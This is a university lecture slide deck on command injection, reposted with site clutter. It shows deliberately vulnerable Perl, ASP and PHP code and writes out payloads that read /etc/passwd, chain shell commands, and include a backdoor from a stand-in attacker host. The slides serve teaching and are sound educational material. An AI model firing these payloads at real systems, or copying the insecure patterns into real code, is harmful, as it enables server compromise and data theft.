Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Web Design

Software Security

advertisement 
Software Security
Lecture 4
Fang Yu
Dept. of MIS,
National Chengchi University
Spring 2011
Outline

Today we will have Adam presenting how to
attack authentications (Ch6)

Before his presentation, I will continue
Command Injections (Ch9), and also I will
present my recent research on how to prevent
and remove injection vulnerabilities

The rest of your presentations have been
scheduled. Please check the course web page
and plan ahead. Let me know if you have any
question.

The course website :

http://soslab.nccu.edu.tw/Courses.html
Injecting Code II
Chapter 9
The Web Application Hacker’s
Handbook
Interpreted Languages


Recall that an interpreted language is one
whose execution involved a runtime
component that interprets the code of the
language and carries out the instructions
that it contains
For example, SQL, Perl, ASP, PHP, etc.
Interpreted Languages

In most applications, the code processed by
the interpreter is a mix of instructions written
by a programmer and data supplied by a
user.

An attacker can supply crafted input that
breaks out of the data context, usually by
supplying some syntax that has a special
significance within the grammar of the
interpreted language.
Command Injection Attacks

Main problem: Incorrect or completely lack
of validation of user input that results in the
execution of commands on the server

We have discussed SQL injections last
week. Today we will discuss OS command,
Web scripting language, SOAP and SMTP
injection attacks.
OS command: Injecting via
Perl

Consider a Perl CGI Code that allows
administrators to specify a directory and
view a summary of its disk usages
#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);
print header, start_html(“”);
print “<pre>”;
my $command = “du -h --exclude php*
/var/www/html”;
$command= $command.param(“dir”);
$command=`$command`;
print “$command\n”;
print end_html;

When used as intended:
Injecting via Perl

“|” is used to redirect the output of a process
to the input of another process

This enables multiple commands to be
chained together

Inject code: (cat /etc/passwd)
OS Command: Injecting via ASP

Consider an ASP code that allows administrators to
view the contents of a requested log file

type the log file

cmd executes the command
<%
Set oScript = Server.CreateObject(“WSCRIPT.SHELL”)
Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”)
szCMD = “type c:\inetpub\wwwroot\logs\“ & Request.Form(“FileName”)
szTempFile = “C:\“ & oFileSys.GetTempName()
Call oScript.Run (“cmd.exe /c “ & szCMD & “ > “ & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>

When used as intended: (submit last5.log)

Use && to batch multiple commands together

Last5.log && dir c:\
Dynamic Execution
Vulnerabilities

The PHP function eval() is used to
dynamically execute code that is passed to
the function at runtime

Consider a search function that enables
users to create stored searches:
https://wahhapp.com/search.php?storedsearch=\$myse
arch%3dwahh

The server side implementation:

creating a mysearch variable with the
value wahh
$storedsearch = $_GET[‘storedsearch’];
eval(“$storedsearch;”);
Dynamic execution in PHP

The semicolon character can be used to
batch commands together in a single
parameter.

For example, to retrieve the contents of the
file /etc/password, you could use either the
file_get_contentsor the system command:
https://wahhapp.com/search.php?storedsearch=\$mysearch%3
dwahh;
%20echo%20file_get_contents(‘/etc/passwd’)
https://wahhapp.com/search.php?storedsearch=\$mysearch%3
dwahh;
%20system(‘cat%20/etc/passwd’)
File Inclusion Attacks

Consider an application that delivers
different content to people in different
locations

A request looks like:
https://wahh-app.com/main.php?Country=US

The application processes as follows:
$country = $_GET[‘Country’];
include( $country . ‘.php’ );
File Inclusion Attacks

If the request has been intercepted:
https://wahhapp.com/main.php?Country=http://wahhattacker.com/backdoor

The sever side may include an arbitrary
remote file
$country = $_GET[‘Country’];
include(http://wahh-attacker.com/backdoor
.‘.php’ );
Quiz

What’s the main cause of injection
vulnerabilities?

How to prevent injection vulnerabilities?

Let’s talk a little bit about Stranger
Next week

We will have Juilette presenting Attacking
Session Management (Chapter 7), Jorina
presenting Attacking Access Controls
(Chapter 8)

We will also have Hsing Hunag presenting
Burp Suite, a tool set for analyzing and
attacking web applications
Related documents
PHP Variable
PHP Variable
Vulnerability Analysis of Web
Vulnerability Analysis of Web
Area overview and summary of papers
Area overview and summary of papers
SCHOOL FEES and PAYMENT DUE DATES Name of Student
SCHOOL FEES and PAYMENT DUE DATES Name of Student
Determiners II
Determiners II
8. PHP-Best-Practices
8. PHP-Best-Practices
big500-businesspresentation
big500-businesspresentation
and get your Cruise FREE! Ask Me How??
and get your Cruise FREE! Ask Me How??
Module1 - University of Houston
Module1 - University of Houston
ppt
ppt
Market Structure - Business Policy and Strategy
Market Structure - Business Policy and Strategy
Automatically Hardening Web Applications Using Precise Tainting
Automatically Hardening Web Applications Using Precise Tainting
Download
advertisement